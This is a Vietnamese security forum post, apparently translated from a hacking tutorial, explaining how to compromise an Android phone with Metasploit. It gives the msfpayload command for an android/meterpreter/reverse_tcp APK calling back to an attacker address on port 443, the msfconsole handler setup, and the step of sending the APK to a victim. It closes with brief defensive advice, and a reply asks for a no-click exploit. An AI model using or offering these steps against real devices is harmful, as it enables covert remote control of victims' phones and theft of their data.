Hacking Android smartphone sử dụng Metasploit

DDos

VIP Members
22/10/2013
524
2.191 bài viết
Hacking Android smartphone sử dụng Metasploit
1490892992android_hack_featured.jpg

Ngày nay, số lượng thiết bị mobile được sử dụng ngày một nhiều trong cuộc sống, kéo theo đó là mối hiểm họa bảo mật cũng tăng theo. Trong bài viết này, mình sẽ hướng dẫn các bạn cách hack android smartphone sử dụng metasploit.

Dưới đây là một vài thông tin cho bài hướng dẫn này:

Attacker IP address: 192.168.8.94

Attacker port to reveive connection: 443

Yêu cầu:
+ Metasploit Framework
+ Android smartphone (HTC One android 4.4 KitKat)

Các bước thực hiện:

1. Mở terminal và tạo một khai thác:

msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=

Như đã được diễn giải ở trên, attacker IP address là 192.168.8.94, bạn sẽ nhập lệnh như hình dưới đây:

1490892992android_hack1.jpg

2. Payload được sử dungj ở đây là reverse_tcp, nó cho phép kết nối từ victim trở lại máy của attacker. Bây giờ trên máy attacker, bạn cần sử dụng module handler. Nhập msfconsole trong terminal

1490892992android_hack2.jpg

3. Sau khi đã thiết lập xong, bạn cần nhập exploit

1490892992android_hack3.jpg

4. Bây giờ, bạn gửi file APK đã tạo được ở bước 1 và gửi cho nạn nhân. Khi nạn nhân click vào file APK bạn sẽ nhận được một kết nối từ victim

1490892992android_hack4.jpg


1490892992android_hack5.jpg


Kết luận:

  1. Không được cài file APK từ một nguồn không rõ ràng
  2. Nếu bạn đã cài file APK từ một nguồn không rõ ràng, hãy chắc chắn rằng bạn có thể xem, đọc và kiểm tra mã nguồn. Hình dưới đây là mã nguồn của file APK độc hại trong hướng dẫn này.

1490892992android_hack6.jpg


Nguồn: hacking-tutorial
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: Hacking Android smartphone sử dụng Metasploit

==! Gửi file thì chơi gì nữa
.
Có lỗi nào kiểu ms08 ấy :D
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thẻ
hack android metasploit
Bên trên